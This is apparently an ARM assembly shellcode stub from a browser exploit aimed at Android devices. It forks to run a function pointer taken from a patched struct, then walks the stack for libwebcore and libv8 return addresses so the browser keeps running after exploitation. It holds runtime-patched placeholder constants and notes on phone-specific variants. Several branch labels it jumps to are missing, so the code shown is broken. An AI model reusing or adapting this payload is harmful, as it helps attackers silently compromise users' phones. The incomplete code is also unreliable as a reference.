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Test Coverage
.globl _start

.section .text    

    .code 32
    push {r0-r7, lr}
    /* Need to preserve r6 */
    adr r4, structfn
    ldr r4, [r4]
    ldr r5, [r4]
    cmp r5, #0
    beq coe
    ldr r7, [r4, #0x4]
    cmp r7, #0
    beq callfn

forkingcall:            /* fok'n call */
    mov    r7, #2
    svc    0
    str     r0, [r4, #0x1c] /* return pid */
    cmp    r0, #0
    bne    cleanexit

    ldr r0, [r4, #0x8]
    ldr r1, [r4, #0xc]
    ldr r2, [r4, #0x10]
    ldr r3, [r4, #0x14]
    ldr r4, [r4, #0x18]
    blx r5
    adr r4, structfn
    ldr r4, [r4]
    str r0, [r4, #0x1c]
    b cleanexit
    /* Continuation of execution */
    /* precondition: */
    /* r6-r12 preserved */
    adr r5, badadd07
    ldr r5, [r5]
    str r5, [r4]            /* write 0xbadadd07 to structfn[0] (checksum)*/
    adr r0, stackbuf
    ldr r0, [r0]
    adr r4, webcorestart
    ldr r4, [r4]            /* r4 <- libwebcore start address */
    adr r5, webcoreend
    ldr r5, [r5]            /* r5 <- libwebcore end address */
    ldr sp, [r0]            /* stack address */

    sub sp, sp, #0x4        /* start search from stackaddress-4 */
                            /* decrement at each iteration */
    ldr r0, [sp]
    cmp r0, r4
    blo findframe           /* if stackword <= webcore start address do another loop */
    cmp r0, r5
    bhs findframe           /* if stackword >= webcore end address do another loop */
    add sp, sp, #0x20       /* add default stack size (0x1c) + 0x4 to compensate */
    adr r4, v8start
    ldr r4, [r4]            /* r4 <- libv8 (if it exists) start address */
    adr r5, v8end
    ldr r5, [r5]            /* r5 <- libv8 (if it exists) end address */

    ldr r0, [sp, #0x8]
    cmp r0, r4
    blo coe_12              /* if stackword <= v8/webcore start address try 12 */
    cmp r0, r5
    bhs coe_12              /* if stackword >= v8/webcore end address try 12 */
    adr r0, altcoeflag
    ldr r0, [r0]
    cmp r0, #1
    beq alt_coe
    pop {r4, r5, pc}          /* <--- REGULAR COE */
    adr r11, structfn         /* <--- ALTERNATE COE (seen in Alcatel and CAT B15) */
    ldr r11, [r11]
    pop {r4, r5}
    ldr r6, [r4, #0xa74]
    pop {pc}

    ldr r0, [sp, #0xc]
    cmp r0, r4
    blo coe_16              /* if stackword <= webcore start address try 16 */
    cmp r0, r5
    bhs coe_16              /* if stackword >= webcore end address try 16 */
    pop {r4, r5, r6, pc}
    pop {r4, r5, r6, r7, pc}
    pop {r0-r7, pc}

        .align 4
stackbuf:    .word 0xbadadd00
webcorestart:    .word 0xbadadd01
webcoreend:    .word 0xbadadd02
v8start:    .word 0xbadadd03
v8end:        .word 0xbadadd04
structfn:    .word 0xbadadd05
altcoeflag:    .word 0xbadadd06
badadd07:    .word 0xbadadd07
eof:        .word 0xbadade0f